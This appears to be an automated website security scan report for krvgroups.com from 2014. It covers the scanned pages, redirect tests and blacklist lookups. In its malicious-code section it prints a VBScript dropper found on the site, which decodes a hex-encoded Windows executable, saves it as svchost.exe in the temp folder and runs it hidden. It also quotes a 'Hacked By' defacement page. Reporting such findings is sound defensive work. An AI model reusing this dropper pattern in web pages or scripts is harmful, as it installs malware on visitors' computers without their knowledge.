Scanned pages/files
Request | Server response | Status |
http://krvgroups.com/ | 200 OK Content-Length: 238258 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below)
DropFileName = 'svchost.exe' WriteData = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D00000000000000000000000000000000000000000000000050450000 Set FSO = CreateObject('Scripting.FileSystemObject') DropPath = FSO.GetSpecialFolder(2) & '' & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng('&H' & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject('WScript.Shell') WSHshell.Run DropPath, 0 Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By : ...[964 bytes skipped]... cription' content='تم الاختراق من قبل تركي ، هكر'> </head> <body bgcolor='#000000'> <p align='center'><b><font size='4' color='#92815C'>Hacked By : </font> <font color='#FFFFFF'><font size='4'>Turki hkr</font></font></b></p> <p align='center'> </p> <p align='center'> <img border='0' src='http://im40.gulfup.com/MCgE8.jpg' width='333' height='333'></p> <p align='center' style='color: rgb(0, 0, 0); font-family: Times New Roman; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-s ...[240614 bytes skipped]...
http://krvgroups.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: krvgroups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 21:08:20 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: krvgroups.com
Referer: http://www.google.com/search?q=krvgroups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=krvgroups.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://krvgroups.com/
Result: krvgroups.com is not infected or malware details are not published yet.